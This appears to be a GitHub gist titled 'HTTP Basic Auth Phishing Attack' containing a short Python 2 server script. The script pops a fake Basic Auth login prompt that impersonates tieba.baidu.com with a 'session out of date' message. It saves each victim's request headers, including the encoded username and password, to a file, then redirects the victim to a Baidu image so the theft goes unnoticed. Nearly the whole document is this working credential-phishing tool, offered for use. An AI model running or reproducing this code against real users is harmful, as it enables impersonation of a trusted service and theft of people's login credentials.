Skip to content

Instantly share code, notes, and snippets.

@lijiejie
Last active August 10, 2016 04:09
Show Gist options
  • Save lijiejie/d51f843563b732bf3907 to your computer and use it in GitHub Desktop.
Save lijiejie/d51f843563b732bf3907 to your computer and use it in GitHub Desktop.
HTTP Basic Auth Phishing Attack
#encoding=utf-8
import SimpleHTTPServer
import SocketServer
import time
class RequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
if str(self.headers).find('UserLogin=1') > 0: # 用户已记录,跳转
self.send_response(302)
self.send_header('Location','http://www.baidu.com/img/bdlogo.gif')
self.end_headers()
else:
if str(self.headers).find('Authorization: Basic ') > 0: # 保存账号密码和Referrer
self.send_response(302)
self.send_header('Set-Cookie', 'UserLogin=1')
self.send_header('Location','http://www.baidu.com/img/bdlogo.gif')
with open('data\\' + time.asctime().replace(':', ' ') + '.txt', 'w') as f:
f.write(str(self.headers))
else:
self.send_response(401)
self.send_header('Content-type','text/html; charset=UTF-8')
self.send_header('WWW-Authenticate', 'Basic realm="Session Out Of Date, Please Login again [tieba.baidu.com]"')
self.end_headers()
PORT = 1234
httpd = SocketServer.TCPServer(("", PORT), RequestHandler)
print "serving at port", PORT
httpd.serve_forever()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment